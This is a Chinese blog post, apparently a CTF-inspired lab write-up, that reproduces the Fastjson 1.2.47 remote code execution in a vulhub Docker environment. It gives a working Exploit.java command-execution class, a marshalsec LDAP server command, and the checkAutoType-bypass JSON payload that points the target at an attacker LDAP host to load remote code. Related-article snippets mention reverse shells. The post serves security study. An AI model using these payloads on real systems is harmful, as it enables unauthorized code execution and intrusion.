fastjson1.2.47RCE漏洞的复现

最新推荐文章于 2024-09-14 14:24:20 发布
最新推荐文章于 2024-09-14 14:24:20 发布
阅读量1.9k 收藏 1
点赞数
分类专栏: CTF 复现 漏洞 文章标签: docker linux java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mrs_H/article/details/120604697
版权
CTF 同时被 3 个专栏收录
31 篇文章 1 订阅
订阅专栏
复现
31 篇文章 4 订阅
订阅专栏
漏洞
7 篇文章 0 订阅
订阅专栏

Fastjson1.2.47RCE漏洞复现

前言

我在上一篇文章中提到了我在长安杯打比赛,有一道我怎么也看不懂的题目,也就是当时“soeasy”。当我我查阅资料以及看了其他师傅们的wp之后,我发现这是Fastjson的一个RCE漏洞。因为以前接触Java的时间比较短,还不够熟悉,所以就去搞了个环境复现这个Fastjson的RCE漏洞。也就有了这篇文章。

环境准备

为了方便起见,我这次直接选择了vulhub的docker环境,有两种方式可以去获得项目源码
一种是直接在github上down下来
https://github.com/vulhub/vulhub
还有一种是去Gitee上下载,两种并没有什么区别,Gitee是国内的,可能速度快一点?
https://gitee.com/puier/vulhub/
(当然这一步在linux系统中只需要git clone)

复现正文

靶机用的是kali,攻击者用的是windows10

1.启动docker环境,进行环境搭建

我们找到vulhub-master文件夹,在里面启动终端。然后输入cd fastjson/1.2.47-rce/
在这里插入图片描述
进入到目录后,我们输入docker-compose up -d启动docker环境。
在这里插入图片描述
这时候我们看一下本地的8090端口,是否已经启动服务
在这里插入图片描述
我们将网络设置为桥接模式,将虚拟机的网卡桥接到我们的物理网卡上。
在这里插入图片描述
看一下靶机的IP地址
在这里插入图片描述
我们从客户机进行访问,发现能够访问。那么,环境搭建完成。
在这里插入图片描述

2.漏洞利用前的准备

我们要事先准备两个文件分别是Exploit.java以及marshalsec-0.0.3-SNAPSHOT-all.jar
其中Exploit.java的内容如下:
这个EXP的创意源自这位大佬

import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
 
public class Exploit{
    public Exploit() throws Exception {
        Process p = Runtime.getRuntime().exec("touch fanxing");
        InputStream is = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(is));
        String line;
        while((line = reader.readLine()) != null) {
            System.out.println(line);
        }
        p.waitFor();
        is.close();
        reader.close();
        p.destroy();
    }
    public static void main(String[] args) throws Exception {
    }
}

将上述提到的两个文件放入同一个文件夹下,然后对Exploit.java进行编译
在这里插入图片描述
然后现在你的新文件夹下应该是这个样子的。
在这里插入图片描述

3.进行漏洞利用

然后我们在刚创建的文件夹下启动cmd,然后用python启动一个web服务

python -m http.server    //(python3)
python -m SimpleHTTPServer  //(python2)

效果大概是这样
在这里插入图片描述
然后我们访问一下本地的8000端口,确认到如下界面,就说明正常了。
在这里插入图片描述
如果之前的配置没有问题,在虚拟机中也可以通过ip:port的形式进行访问
然后还是在该目录下打开一个cmd窗口
输入java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://ip:port/#Exploit用来启动LDAP服务(这里的ip就是你攻击者的ip,port就是刚才python开启的端口)
在这里插入图片描述
然后用brup进行发包
在这里插入图片描述

{
 
    "name":{
 
        "@type":"java.lang.Class",
 
        "val":"com.sun.rowset.JdbcRowSetImpl"
 
    },
 
    "x":{
 
        "@type":"com.sun.rowset.JdbcRowSetImpl",
 
        "dataSourceName":"ldap://192.168.1.5:1389/Exploit",
 
        "autoCommit":true
 
    }
 
 
 
}

上面的ip是攻击者的ip端口是开启LDAP服务的端口。

上面这个exp的原理找我的理解讲就是在name这个键值对中,利用checkautotype()函数将com.sun.rowset.JdbcRowSetImpl存入mappings中,这就导致了我们的第二个键值对在被程序接受的时候,绕过了checkAutoType的黑名单限制,从而拿到了一个com.sun.rowset.JdbcRowSetImpl对象并通过com.sun.rowset.JdbcRowSetImpl对象中的一些方法调用实现命令执行。

利用brup进行发包之后然LDAP服务会有反应。
在这里插入图片描述
去kali中查看命令执行情况。
应为我是用docker搭建的环境,所以所有的RCE都只会在docker内部的环境中得到显现,所以需要先输入docker exec -i 1247-rce_web_1 bash最后一个参数是容器名称
在这里插入图片描述
然后ls一下
在这里插入图片描述
发现他在目录下创建了名为fanxing的目录RCE成功。

总结与反思

在这次的复现过程中,很明显的一个问题就是,我最终并没有去getshell,因为我的这个环境从整体看来是不完整的,仍然被局限在了docker里面,所以拿不了shell。在复现过程中我也曾尝试把docker里的bash拿出来,但都失败了。

Mrs_H
关注
专栏目录
技术分享 | Fastjson-RCE漏洞复现
Jeeseen123的博客
05-26 511
Fastjson提供autotype功能,允许用户在反序列化数据中通过 @type 指定反序列化的类型,其次Fastjson自定义的反序列化会调用指定类中的setter方法和部分getter方法。 当组件开启autotype并且反序列化不可信的数据时,攻击者构造的数据(恶意代码)会进入特定类的setter或getter方法中,可能会被恶意利用。 影响版本 Fastjson1.2.47以及之前的版本 复现 1.1 环境准备 攻击机1 用于接受反弹shell 系统:Win10 x64 安装nc,burpsuit
fastjson 1.2.47 RCE漏洞保姆级复现
ALLEN'Blog
02-01 1327
Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。并且在Fastjson
fastjson<1.2.47 RCE 漏洞复现
ai74583的博客
07-15 798
这两天爆出了 fastjson 的老洞,复现简单记录一下。 首先使用 spark 搭建一个简易的利用 fastjson 解析 json 的 http server。 package cn.hacktech.fastjsonserver; import com.alibaba.fastjson.JSON; import static spark.Spark.*; public cla...
远程代码执行漏洞RCE)分析与复现
最新发布
ABUG
09-14 609
这种漏洞通常出现在没有对输入数据进行严格过滤和验证的情况下,允许恶意用户发送特制的输入,使服务器执行未授权的命令或程序。远程代码执行漏洞的严重性不言而喻,攻击者可以通过未受控的输入执行恶意命令,直接控制服务器或获取敏感信息。我们将使用常见的Web应用程序漏洞示例,来展示一个典型的RCE漏洞的发现与利用过程。RCE的危害性非常高,攻击者可以直接接管服务器,执行恶意代码,访问敏感数据,或进行更多的破坏性操作。提交恶意输入后,如果漏洞存在,页面会返回两条命令的结果:ping 命令的结果和 ls 命令的结果。
漏洞复现Fastjson_1.2.47_rce
过期的秋刀鱼
11-04 851
Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。fastjson1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。后可向其POST新的JSON对象,后端会利用fastjson进行解析。发送POC到FastJson服务器,通过RMI协议远程加载恶意类。构造反弹shell,进行base64编码。将content-type修改为。即可看到一个json对象被返回。
漏洞库】Fastjson_1.2.47_rce
yuan_boss的博客
09-08 1198
我们可以看到connect方法中具有JNDI的lookup方法,lookup是JNDI用于查找资源的方法,里面传的参数是dataSourceName,所以我们可以在payload的json字符串中传入这个参数dataSourceName,并且指定他的 值为我们的RMI服务或者其他服务,lookup就会到我们指定的服务中下载恶意代码并执行。fastjson1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。
Fastjson 1.2.47反序列化漏洞复现
m0_54899775的博客
03-16 3451
Fastjson 1.2.47反序列化漏洞复现
渗透测试-Fastjson 1.2.47 RCE漏洞复现
道阻且长,行则将至。
07-11 7340
漏洞概述 Fastjson是阿里巴巴公司开源的一款 json 解析器,其性能优越,被广泛应用于各大厂商的Java项目中。Fastjson 近几年被爆出的反序列化 RCE 漏洞影响无数厂商,2017年官方主动爆出了 fastjson 1.2.24 的反序列化漏洞以及升级公告,fastjson1.2.24 版本后增加了反序列化白名单。 而在2019年6月,fastjson 又被爆出在 fastjson< =1.2.47 的版本中,攻击者可以利用特殊构造的 json 字符串绕过白名单检测,成功执行任意
fastjson1.2.47RCE远程命令执行漏洞复现
zyl404的博客
01-06 1863
fastjson1.2.47RCE远程命令执行漏洞分析 漏洞背景 在2019年6月,fastjson 被爆出在 fastjson< =1.2.47 的版本中,攻击者可以利用特殊构造的 json 字符串绕过白名单检测,成功执行任意命令。 漏洞分析 此漏洞利用的核心点是java.lang.class这个java的基础类,在fastjson 1.2.48以前的版本没有做该类做任何限制,加上代码的一些逻辑缺陷,造成黑名单以及autotype的绕过。 过程: 1.Fastjson在开始解析json (JS 对象
FastjsonRCE1.2.47漏洞复现
02-24 1544
Fastjson漏洞原理和RCE1.2.47漏洞复现
fastjson1.2.47以下 RCE 漏洞复现
问题很多的小明
09-21 1349
author:test Ox01 具体环境 War包部署在tomcat,war包使用fastjson解析 tomcat版本 java版本 0x02 尝试是否可以接受请求(也可以没有这一步) 先尝试是否可以收到ldap请求 post数据包如下: POST /fastjson/ HTTP/1.1 Host: x.x.x.x:8080 Cache-Control: max-age=0 Upgrade...
fastjson_1.2.47rce漏洞复现
weixin_71090536的博客
01-23 1866
Fastjson是一个 Java 语言编写的高性能 JSON 解析器和生成器
【Vulhub】Fastjson 1.2.24_rce复现
woshicainiao666的博客
05-31 1035
RMI(远程方法调用)使用 RMI 技术可以使一个 JVM 中的对象,调用另一个 JVM 中的对象方法并获取调用结果。fastjson 提供了 autotype 功能,在请求过程中,我们可以在请求包中通过修改@type 的值,来反序列化为指定的类型,而 fastjson 在反序列化过程中会设置和获取类中的属性,如果类中存在恶意方法,就会导致代码执行等这类问题。正常请求是 get 请求并且没有请求体,可以通过构造错误的 POST 请求,即可查看在返回包中是否有 fastjson 这个字符串来判断。
fastjson 1.2.24 反序列化 RCE 漏洞复现
m0_63299551的博客
06-27 450
具体可以参考这篇文章FastJson的介绍与使用(一)_maven fastjson-CSDN博客fastjson最主要的功能就是可以将Java对象和json之间来回转化,而这个漏洞出现的原因就是在反序列化的过程中。
Fastjson1.2.24RCE漏洞复现
L1928的博客
05-18 934
1.启动环境并且访问 2.下载marshalsec-0.0.3-SNAPSHOT-all.jar 3.新建Shell.java文件 import java.lang.Runtime; import java.lang.Process; public class shell{ static { try { Runtime rt = Runtime.getRuntime(); String[] commands = {“/bin/bash”,“-c”,“exec 5<>/dev/tcp/192.
fastjsonRCE漏洞复现记录
beijiao3982的博客
07-31 959
参考链接: https://paper.seebug.org/994/https://www.cnblogs.com/jinqi520/p/11097779.htmlhttps://xz.aliyun.com/t/5680 0x01 漏洞复现 RMi 1. payload: {"@type":"java.lang.Class",br/>"a":{"@type":"java.lang.Cla...
fastjson(反序列化)漏洞复现
weixin_58954236的博客
09-11 1366
FastJson是Alibaba的一款开源Json解析库,可用于将Java对象转换为其Json表示形式,也可以用于将Json字符串转换为等效的Java对象。近几年来FastJson漏洞层出不穷。RCE漏洞的源头:17年FastJson爆出的1.2.24反序列化漏洞。​ 关于FastJson1.2.24反序列化漏洞,简单来说,就是FastJson通过parseObject/parse将传入的字符串反序列化为Java对象时由于没有进行合理检查而导致的。
Fastjson <= 1.2.47 反序列化漏洞复现
qq_32660043的博客
08-23 463
0x01 前言 Fastjson 是一个 Java 语言编写的高性能功能完善的 JSON 库,可以将 Java 对象转换为 JSON 格式,也可以将 JSON 字符串转换为 Java 对象,在中国和美国使用较为广泛。 0x02 漏洞成因 Fastjson < 1.2.68 版本在处理反序列化对象时存在安全问题,导致攻击者可以执行 java 代码,具体分析可参考:FastJson 反序列化学习 0x03 环境准备 docker 搜索 Fastjson 漏洞利用镜像: docker search fas
fastjson1.2.47漏洞复现
07-27
根据引用\[1\]和引用\[2\]的内容,可以使用LDAP方法来利用fastjson1.2.47漏洞。在实战情况下,推荐使用LDAP方法进行利用。fastjson1.2.47过滤了许多恶意类的上传姿势以及关闭了autoType,但是并不阻挡攻击者的攻击步骤。在fastjson中存在一个全局缓存,当有类进行加载时,如果autoType没有开启,会尝试从缓存中获取类,如果缓存中有,则直接返回。因此,可以通过上传一个带有恶意类的json数据,让它执行并存入缓存,从而绕过漏洞防护机制。\[2\] 具体的漏洞复现步骤如下: 1. 首先,需要启动一个RMI服务器,可以使用以下命令:java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://本机IP:1222/#Exploit" 9999。这个命令将在本地的1222端口上启动一个RMI服务器,并将其绑定到9999端口上。\[3\] 2. 接下来,需要构造一个恶意的json数据,其中包含恶意类的payload。可以使用各种方法来构造这个json数据,例如手动编写或使用工具生成。 3. 将构造好的恶意json数据发送给目标系统,触发fastjson解析该数据的过程。 4. 当fastjson解析恶意json数据时,会尝试从缓存中获取类。由于autoType没有开启,fastjson会尝试从缓存中获取类,如果缓存中有,则直接返回。 5. 通过这种方式,攻击者可以绕过fastjson漏洞防护机制,执行恶意代码。 需要注意的是,漏洞复现仅用于安全研究和测试目的,未经授权的利用可能涉及违法行为,请遵守法律法规。 #### 引用[.reference_title] - *1* *3* [Fastjson命令执行漏洞复现1.2.471.2.24)](https://blog.csdn.net/xiaobai_20190815/article/details/124117105)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [fastjson1.2.47漏洞复现](https://blog.csdn.net/m0_63699746/article/details/131551535)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值